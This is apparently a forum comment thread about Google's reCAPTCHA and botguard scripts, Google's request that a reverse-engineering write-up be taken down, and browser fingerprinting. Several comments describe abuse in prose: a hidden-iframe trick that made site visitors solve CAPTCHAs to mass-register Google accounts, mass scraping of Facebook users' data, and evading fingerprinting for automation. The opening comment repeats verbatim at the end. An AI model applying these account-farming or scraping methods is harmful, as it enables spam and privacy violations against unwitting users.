When I was a fifteen year old "internet marketer" I was able to create 60,000 google accounts from residential IP's, despite google's CAPTCHA system. As a fifteen year old kid, that's when I knew google is not an invincible company.
The trick was that google's backend registration logic did not validate the referrer of the signup form, or that the submitting IP address matched the one that downloaded the CAPTCHA. So I cloned the form on my own server, loaded it in an invisible iFrame with all fields filled except the CAPTCHA. Then I served the CAPTCHA to the user, who solved it and clicked "submit". Then the entire hidden form in the iframe submitted and registered a google account with the visitor's IP.
I was surprised that worked, because it was a huge vulnerability. Nowadays I would go for the bug bounty, but back then I tried to sell it for $5k -- unfortunately nobody believed I could do it and I couldn't prove it without revealing the method, so I ended up unable to take advantage of the code.
I did have about 60k accounts from random page views on blogspot blogs, but I never did anything with them. Perhaps that was the only time my inability to finish projects ironically saved me from some trouble. :)
You probably wouldn't have got in much trouble, just a c&d and probably asked to fork over some money from your profits and sign a contract with google that youll never do it again (And "your" account on google disabled"). ;)
At least thats what happend with me and my friend when we mined about 1/10th of users from facebook, and crowdsourced a bunch of info from people, made it public, (we had an psudeoanonmyous no login messaging feature where people would literally share informaion that would make people question what privacy is when n-1 people are divulging everything about you) from searching names. If I wasn't a US citizen, id probably do it better now that i know more of what im up against. Maybe the landscape might be more open in the US in the future.
People moan on and on about facebook and companies like them as if they are all powerfull (they can seem that way if you play by their rules and submit to their jurisdiction for pragmatic reasons), but challenging those assumptions and leveraging user behaviors, and arbitraging legalities, one can probably crack some pretty big holes...
I received an email from Google requesting the following:
> The code you reversed is used to protect many sites’ registration process including Google and many others. We are concerned that having your code and analysis publicly available will make it easier to build registration automation tools which will result in a surge of spam in all the services protected by this code and will affect negatively many Internet users.
> This is why we kindly ask you to temporarily remove it from GitHub so your work won’t be used for a malicious purpose which we believe was never your intended goal.
As I wasn't aware that the botguard was also used for this purpose (separately of ReCaptcha, in Gmail and other services) before publishing my code, I removed the GitHub repository for now. I'm sorry for honest security enthusiasts who didn't read the article, but I don't want to cause harm.
Google also proposed me to come visit them in their offices to discuss about my work.
Considering that this was done using information also available to malicious parties, is now "out there" even if you take it down yourself and is just a security by obscurity scheme it does leave an bad aftertaste in my mouth.
Google is essentially trying to run code on a user's computer but doesn't want anyone to know what it's running there while it doesn't stop the "bad guys" from doing their own analysis without publishing it. I'm not saying that they're trying to do anything evil, but it just strikes all the wrong notes for me when they try to suppress information on a system they should have known is wide-open to analysis.
That's a bit strange, usually Google will just make changes that invalidate your analyses (and they can definitely make changes rather quickly.) In other words, by reacting in this way they're basically saying "we rely on security through obscurity". I was almost expecting a "you remove it, or we'll remove your site from our search results." The fact that it's a tracking script might have something to do with it...
I had forked you, but after reading this I decided to remove the git repository too.
I think reCaptcha is overused by services that should be publicly available for automation, specially in Brazil. I think this is a bad use case for reCaptcha or any other captcha system.
But I also understand that the majority of reCaptcha users are fighting against spam, and the public description of their javascript engine could really hurt the Internet.
So in other words, it's a tracking script also serving as a captcha.
"Google servers will receive and process, at least, the following information:
Plug-ins
User-agent
Screen resolution
Execution time, timezone
Number of click/keyboard/touch actions in the <iframe> of the captcha
It tests the behavior of many browser-specific functions and CSS rules
It checks the rendering of canvas elements
Likely cookies server-side (it's executed on the www.google.com domain)
And likely other stuff...
"
At least the old captcha was a more simpler image.
Some of this data is readily available in the user-agent string. The other does require some JS execution and sending the results back though. Check this out: https://valve.github.io/fingerprintjs/
until there's a significant number of people doing the same thing, you're simply "that guy in <insert geoip lookup city here> with the randomized UA", and you're infinitely more fingerprintable than just about anybody else on the internet. got to EFF's panopticlick to see how unique your fingerprint is. using an iPad with up-to-date software gets me the same fingerprint as about 18000 other people in my geoip region, i haven't been able to do better than that yet.
if your other browser properties don't match the UA though, you're still showing up as a unique fingerprint. You'll be the guy with an IE8 UA sending an accept:image/webp header, or the guy with a Safari UA who's following link prefetching instructions that are only valid in chrome, or something else that makes you unique.
or my personal favourite: sending the do-not-track header, something that only a small number of people send that makes you much easier to fingerprint.
The combination of UA and accept headers need to be changed in sync. Good point - any other things like that that should be watched out for?
And DNT is currently at around ~8%, so, although it does leak some information, it doesn't leak an absurd amount (~3.6 bits). (That's using data from here [1], which is FF-only. If you have a better source of data for this, please let me know.)
Any number of things can out you as a fake. Whether or not the request's Accept-Encoding has sdch, can help you figure out if something's Chrome.
You can also abuse parsing quirks to figure out which rendering engine's being used, or just try to use request-generating features that shouldn't be present in whatever browser you're saying you are (<svg>, <video>, styling on engine-specific psuedoelements, etc.)
Here's an example[1] using just HTML+CSS that will request a different image depending on whether you use a webkit or gecko derivative. If you use neither, no image will be requested. Someone who says they're Chrome but requests Firefox's image is immediately outed as a liar.
I believe Mario Heiderich also posted some stuff using webkit's styleable scrollbars that could be used for fingerprinting screen sizes and how large certain elements are when rendered.
The list goes on, but my point is that fingerprinting at the rendering / layout engine level is trivial, so you're better off being legitimately ordinary if you're worried about fingerprinting.
Are your headers in the correct order for the given UA?
Correct capitalisation for the given UA?
Correct accept for the given UA?
Correct white space around or between values for the given UA?
It is far better to appear to be the same as everyone else if you want to be anonymous (i.e. to browse on an iPad) than it is to do anything to try and not be tracked.
Anonymity today is to be invisible within the crowd, not to stand out as you are the only sheep that is shorn.
In Bulgaria, we had a joke about our communist president Todor Zhivkov, who was supposedly hiding from the fascists in the forests. So, the joke was that he was hiding... but nobody was looking for him, because he hasn't done anything to get their attention. Anyway, trying to "hide" is "security by obscurity". It's like your defense being hiding your SSN from your computer, when other weaker systems can already be exploited and your SSN could be stolen from them. Whatever you have to hide, it's already kept somewhere else in most cases. Instead, find a defense strategy that does not depend on obscurity - this is the only defense.
At the end of the day only google.com cookies make sense, everything else can be routinely faked just like author says "Programmatically bypass the captcha by simply executing a rendering engine and automating movements of the mouse." What google was trying to hide? They seem to put a lot of effort in it.
It's enough information to come up with a unique fingerprint without using cookies.
With that fingerprint they can track your habits across multiple domains. Bots can look like browsers, but they can't necessarily browse the internet the same way a human can.
What habits? There's nothing else google can see, they only track movements inside of recaptcha iframe. They have 0 information about how you browse web.
They have all your interaction with every Google property, tied to your account when you're logged in and semi-persistent pseudonymous identities when you are not. They have the clickstream data between every google property (most notably, Search) and the rest of your web experience, which can (fairly easily) reveal many websites you visit. They have ga.js or AdSense tracking code running on double-digit percentages of all pages on the Internet.
If asked to, Google could provide you with as accurate a record of my flights between Japan and the US as either nation's customs agency could, simply by looking at a time series of IP addresses. Their data got radically more accurate a few years ago when I started using Google Maps with the location permission turned on.
For added giggles, Google is a SQL join away from associating my extraordinarily-well-established-but-weakly-verified Internet identity with unique identifiers like e.g. my social security number. That would probably make someone in the Borg hesitate for a few minutes, but clearly they're OK with saying "At scale, we know the huge class of people which happens to include Patrick -- who we know intimately but prefer to avoid acknowledging that fact in social settings -- is identifiable by a vector of features, and a machine can very quickly cluster a random Internet user with Patrick versus with Spammy McSpamsalot. We can thereby organize data about this person to serve their needs better, for example by giving them access to resources only for trusted people, like captcha-free whatevers. Bonus: this is one more reason why it is fun and convenient to invite Google into even more areas of their life! It's a win-win!"
I probably didn't make it clear - recaptcha iframe provides 0 useful information about how you browse web. Of course other google services such as analytics and chrome collect more than enough about your habits. But I don't believe "mouse tracking" inside of 200x400 iframe, nonsense
The new system is incredibly cumbersome when you have to type the captcha. It went from 2 key presses to 5 (plus actually typing the text of course). Obviously if you just need to tick it everything is fine, but for me the tick works ~5% of the time.
It's similar to when malware authors pack and encode their stuff.
At the end of the day, it does not stop a determined individual from reverse engineering the code (and then publishing the technique).
BUT it does make it more difficult to understand, work with, etc. It simply reduces the number of individuals who have the skills necessary to follow everything though.
It will deter the less skilled people from attempting to "hack" the system....
> It will deter the less skilled people from attempting to "hack" the system....
... especially if slight changes are made. Google could change the smallest thing and run the lot back through their mangler and the attacker would have to go through the process of unobfuscating it all over again.
The trick was that google's backend registration logic did not validate the referrer of the signup form, or that the submitting IP address matched the one that downloaded the CAPTCHA. So I cloned the form on my own server, loaded it in an invisible iFrame with all fields filled except the CAPTCHA. Then I served the CAPTCHA to the user, who solved it and clicked "submit". Then the entire hidden form in the iframe submitted and registered a google account with the visitor's IP.
I was surprised that worked, because it was a huge vulnerability. Nowadays I would go for the bug bounty, but back then I tried to sell it for $5k -- unfortunately nobody believed I could do it and I couldn't prove it without revealing the method, so I ended up unable to take advantage of the code.
I did have about 60k accounts from random page views on blogspot blogs, but I never did anything with them. Perhaps that was the only time my inability to finish projects ironically saved me from some trouble. :)